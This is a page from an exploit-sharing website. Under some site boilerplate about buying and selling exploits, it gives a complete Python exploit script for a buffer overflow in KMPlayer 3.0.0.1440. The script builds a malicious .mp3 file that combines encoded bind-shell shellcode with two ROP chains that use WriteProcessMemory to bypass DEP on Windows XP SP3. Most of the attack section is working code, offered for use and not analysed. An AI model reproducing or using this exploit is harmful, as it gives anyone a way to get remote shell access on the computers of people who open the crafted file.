0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass
#!/usr/bin/python # # The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass # # Downloaded from: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html # # 06 Jun 11 # # Cobbled together by dookie and ronin # # This exploit performs DEP bypass on WinXP SP3 with 2 different offsets. # In our testing environments, there were 2 separate offsets. One offset # applies to VMs running on Xen and VMware workstation for Linux. The # second offset applies to ESXi and VMware Fusion. import os evilfile = "km_pwn.mp3" head = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00" cruft = "\x85" * 3162 nops = "\x90" * 28 nops += "\x91\x90\x90\x90" # The last byte gets decremented in rop2 while pointing EAX at the shellcode nops += "\x90" * 20 #shellcode = "\xcc" * 368 # Size of bind shell #root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b '\x00\x0a\x0d' -t c #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) shellcode = ("\xbd\xcf\xd8\x7c\xd0\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" "\x56\x31\x68\x13\x83\xc0\x04\x03\x68\xc0\x3a\x89\x2c\x36\x33" "\x72\xcd\xc6\x24\xfa\x28\xf7\x76\x98\x39\xa5\x46\xea\x6c\x45" "\x2c\xbe\x84\xde\x40\x17\xaa\x57\xee\x41\x85\x68\xde\x4d\x49" "\xaa\x40\x32\x90\xfe\xa2\x0b\x5b\xf3\xa3\x4c\x86\xfb\xf6\x05" "\xcc\xa9\xe6\x22\x90\x71\x06\xe5\x9e\xc9\x70\x80\x61\xbd\xca" "\x8b\xb1\x6d\x40\xc3\x29\x06\x0e\xf4\x48\xcb\x4c\xc8\x03\x60" "\xa6\xba\x95\xa0\xf6\x43\xa4\x8c\x55\x7a\x08\x01\xa7\xba\xaf" "\xf9\xd2\xb0\xd3\x84\xe4\x02\xa9\x52\x60\x97\x09\x11\xd2\x73" "\xab\xf6\x85\xf0\xa7\xb3\xc2\x5f\xa4\x42\x06\xd4\xd0\xcf\xa9" "\x3b\x51\x8b\x8d\x9f\x39\x48\xaf\x86\xe7\x3f\xd0\xd9\x40\xe0" "\x74\x91\x63\xf5\x0f\xf8\xeb\x3a\x22\x03\xec\x54\x35\x70\xde" "\xfb\xed\x1e\x52\x74\x28\xd8\x95\xaf\x8c\x76\x68\x4f\xed\x5f" "\xaf\x1b\xbd\xf7\x06\x23\x56\x08\xa6\xf6\xf9\x58\x08\xa8\xb9" "\x08\xe8\x18\x52\x43\xe7\x47\x42\x6c\x2d\xfe\x44\xa2\x15\x53" "\x23\xc7\xa9\x42\xef\x4e\x4f\x0e\x1f\x07\xc7\xa6\xdd\x7c\xd0" "\x51\x1d\x57\x4c\xca\x89\xef\x9a\xcc\xb6\xef\x88\x7f\x1a\x47" "\x5b\x0b\x70\x5c\x7a\x0c\x5d\xf4\xf5\x35\x36\x8e\x6b\xf4\xa6" "\x8f\xa1\x6e\x4a\x1d\x2e\x6e\x05\x3e\xf9\x39\x42\xf0\xf0\xaf" "\x7e\xab\xaa\xcd\x82\x2d\x94\x55\x59\x8e\x1b\x54\x2c\xaa\x3f" "\x46\xe8\x33\x04\x32\xa4\x65\xd2\xec\x02\xdc\x94\x46\xdd\xb3" "\x7e\x0e\x98\xff\x40\x48\xa5\xd5\x36\xb4\x14\x80\x0e\xcb\x99" "\x44\x87\xb4\xc7\xf4\x68\x6f\x4c\x04\x23\x2d\xe5\x8d\xea\xa4" "\xb7\xd3\x0c\x13\xfb\xed\x8e\x91\x84\x09\x8e\xd0\x81\x56\x08" "\x09\xf8\xc7\xfd\x2d\xaf\xe8\xd7") ##################### ROP Chain for VMware Workstation (Linux) and Xen ##################### eip = "\x71\x14\x40\x00" # 00401471 RETN Pivot to the stack toesp = "\x42" * 4 wpm = "\x13\x22\x80\x7c" # 7C802213 WriteProcessMemory - XPSP3 wpm += "\x20\x1f\x45\x02" # 02451F20 in_wm.dll - Return after WPM wpm += "\xff\xff\xff\xff" # hProcess wpm += "\x10\x1f\x45\x02" # 02451F10 in_wm.dll - Address to Patch wpm += "\xbe\xba\xfe\xca" # lpBuffer placeholder (Shellcode Address) wpm += "\xce\xfa\xed\xfe" # nSize placeholder (Shellcode Size) wpm += "\xc0\x2b\x45\x02" # 02452BC0 in_wm.dll - Pointer for Written Bytes # Get a copy of ESP into a register rop1 = "\x4f\x92\x71\x13" # 1371924F : {POP} # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll) rop1 += "\x41" * 12 # Junk to be popped into ESI, EBP, and EBX junk = "\x61" * 52 # Junk in between our VirtualProtect parameters and the next ROP chain # Put a copy of the saved ESP from EDI into EAX rop2 = "\x75\x66\x8a\x5b" # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) rop2 += "\x41" * 8 # Compensate for the RETN 8 in rop1 # Increase EAX to point at our shellcode rop2 += "\x37\x75\x37\x02" # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll) rop2 += "\x37\x75\x37\x02" # 02377537 : # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll) # Write the address of the shellcode into the lpBuffer placeholder # First need to put EAX in a safe spot then juggle around EDI to get it to ESI rop2 += "\xc3\x87\xec\x76" # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll) rop2 += "\x75\x66\x8a\x5b" # 5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) rop2 += "\xd8\xc3\x3c\x76" # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll) rop2 += "\xc3\x87\xec\x76" # 76EC87C3 : # XCHG EAX,EDX # RETN (TAPI32.dll) rop2 += "\xbe\x9c\xca\x76" # 76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll) rop2 += "\x41" * 4 # Junk to be popped into ESI # Get the intial ESP value back into ESI rop2 += "\xe6\x57\x01\x15" #150157E6 : {POP} # DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll) rop2 += "\x41" * 8 # Junk to be popped into EBX and ECX # Get the initial ESP value back into ESI rop2 += "\xd8\xc3\x3c\x76" # 763CC3D8 : # XCHG EAX,ESI # RETN (comdlg32.dll) # Zero EAX and set it to the shellcode size (0x200) rop2 += "\xc0\x11\x37\x02" # 023711C0 : # XOR EAX,EAX # RETN (in_mp4.dll) rop2 += "\xe9\x0b\x44\x02" # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll) rop2 += "\x41" * 4 # Junk to be popped into EBP rop2 += "\xe9\x0b\x44\x02" # 02440BE9 : # ADD EAX,100 # POP EBP # RETN (in_wm.dll) rop2 += "\x41" * 4 # Junk to be popped into EBP # Write the shellcode size into the nSize placeholder rop2 += "\x3f\xcf\x9e\x7c" # 7C9ECF3F : {POP} # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll) rop2 += "\x41" * 8 # Junk to be popped into ESI and EBP # Point EAX to the WPM setup on the stack, push EAX and POP it into ESP rop2 += "\x41\x15\x5d\x77" # 775D1541 : # SUB EAX,4 # RETN (ole32.dll) rop2 += "\x41" * 4 rop2 += "\x51\xeb\x43\x02" # 0243EB51 : # ADD EAX,0C # RETN (in_wm.dll) rop2 += "\xce\x05\x42\x02" # 024205CE : {POP} # PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll) rop2 += "\x41" * 4 # Junk to be popped into ESI rop2 += "\x41" * 32 ############################# ROP Chain for VMware Fusion and ESXi ############################ ############################################################################################### ## ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction ############################################################################################### #put this in ESI to use it for subtraction from ESP. need to land in the big buffer 14830 = 39ee jmp_value = "\xf0\x38\x00\x00" rop_1 = "\x46"*4 #0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll) ** rop_1 += "\x2c\x80\x44\x77" #0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) ** rop_1 += "\x75\x66\x8a\x5b" #0x7C926021 : {POP} # SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll) ** rop_1 += "\x21\x60\x92\x7c" rop_1 += "\x50" * 8 #0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll) ** rop_1 += "\x09\x15\x45\x7e" ############################################################################################### filler_a1 = "\x41"*360 ############################################################################################### ## ROP_2 = all about the shell ############################################################################################### ######### SAVING STACKPOINTERS ################################################################ #0x7744802C : # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll) ** rop_2 = "\x2c\x80\x44\x77" #0x5B8A6675 : # PUSH EDI # POP EAX # RETN (NETAPI32.dll) ** rop_2 += "\x75\x66\x8a\x5b" #0x5B8A9F1E : # ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll) ** rop_2 += "\x1e\x9f\x8a\x5b" rop_2 += "\x43\x43\x43\x43" #WriteProcessMemory construct with the two placeholders we need to generate on the fly ############################################################################################### rop_2 += "\x13\x22\x80\x7c" #WriteProcMem - XPSP3 rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target rop_2 += "\xff\xff\xff\xff" #hProcess rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target rop_2 += "\xbe\xba\xfe\xca" #lpBuffer placeholder (Shellcode Address) rop_2 += "\xce\xfa\xed\xfe" #lpBuffer placeholder (Shellcode Size) rop_2 += "\10\x20\x98\x7c" #writeable location in ntdll ############################################################################################### ######### FIRST PARAM - lpBuffer placeholder (Shellcode Address)############################### #gadgets (plus various paddings) used to construct the memory address which will point to our shellcode #then we write the value to the correct memory address and restore EAX rop_2 += "\x44" * 40 #0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll) ** rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x44" *32 rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x44"*4 #0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll) ** rop_2 += "\x8d\xda\x45\x7e" #0x77DD994E : # XCHG EAX,EDI # RETN 2 (ADVAPI32.dll) ** rop_2 += "\x4e\x99\xdd\x77" #0x7C910C66 : # XCHG EAX,ESI # RETN 2 (ntdll.dll) ** rop_2 += "\x66\x0c\x91\x7c" #padding rop_2 += "\x44" * 2 #0x7E45DA8D : # XCHG EAX,EBP # RETN (USER32.dll) ** rop_2 += "\x8d\xda\x45\x7e" #padding rop_2 += "\x44"*2 #0x76CA9CBE : # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll) ** rop_2 += "\xbe\x9c\xca\x76" ############################################################################################### ######### SIZE PARAM - lpBuffer placeholder (Shellcode Size) ################################## #gadgets (plus various paddings) used to construct the size value for our buffer (using 0x200 bytes) #then we write the value to the correct memory address and restore EAX rop_2 += "\x47" *4 #0x775D156E : # PUSH EAX # POP ESI # RETN (ole32.dll) ** rop_2 += "\x6e\x15\x5d\x77" #0x7E433785 : # XOR EAX,EAX # RETN 4 (USER32.dll) ** rop_2 += "\x85\x37\x43\x7e" #0x7C974E8E : # ADD EAX,100 # POP EBP # RETN (ntdll.dll) ** rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x45"*8 rop_2 += "\x8e\x4e\x97\x7c" rop_2 += "\x45"*4 #0x75D0AA2E : # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN (mlang.dll) ** rop_2 += "\x2e\xaa\xd0\x75" ############################################################################################### ############################################################################################### ######### Realigning EAX to point to WPM and setting ESP to it ################################ rop_2 += "\x50" * 4 #0x76CAF118 : # ADD EAX,0C # RETN (IMAGEHLP.dll) ** rop_2 += "\x18\xf1\xca\x76" #0x7E451509 : # XCHG EAX,ESP # RETN (USER32.dll) ** rop_2 += "\x09\x15\x45\x7e" rop_2 += "\x43"*316 ############################################################################################### ##################### VARIOUS PADDINGS AND OTHER NONSENSE ##################################### #slide into the shell nops_7 = "\x90"*56 #after the shell junk filler_a2 = "\x42" * (3200) ############################################################################################### ############################# PUTTING IT TOGETHER ############################################# filler_a = filler_a1 + rop_2 + nops_7 +shellcode +filler_a2 #small buffer filler filler_b = "\x44" * (95) #the whole shebang (ronin's version) filler = filler_a+jmp_value+eip+rop_1+filler_b ############################################################################################### sploit = head + cruft + eip + toesp + rop1 + wpm + junk + rop2 + nops + shellcode + filler crashy = open(evilfile,"w") crashy.write(sploit) crashy.close() # 0day.today [2024-12-24] #